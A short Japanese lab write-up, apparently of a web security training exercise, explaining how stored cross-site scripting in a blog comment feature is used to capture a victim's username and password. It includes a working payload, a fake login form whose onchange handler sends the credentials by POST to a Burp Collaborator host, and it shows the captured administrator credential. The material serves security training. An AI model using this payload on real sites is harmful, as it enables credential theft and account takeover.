Hello there, ('ω')ノ
クロスサイトスクリプティングを活用してパスワードを取得を。
このラボでは、ブログのコメント機能に脆弱性があって。
この脆弱性を悪用して被害者のユーザ名とパスワードを盗んで。
被害者のアカウントにログインするとのことで。
まずは、脆弱性の確認を。
一方、コラボレータのペイロードをコピーしておいて。
脆弱性の存在が確認できたので、下記のスクリプトを投稿することに。
このスクリプトは、コメントを表示する際にPOSTリクエストを発行して。
その中には、ユーザ名とパスワードが含まれていて。
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://4glfpr1femd0nyamebn452y1ys4js8.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
POSTのリクエストボディに被害者のユーザ名とパスワードがあって。
administrator:2q5b0ww193d317gpgyaf
コラボレータから取得したIDとパスワードでログインすると。
クリアできた。
Best regards, (^^ゞ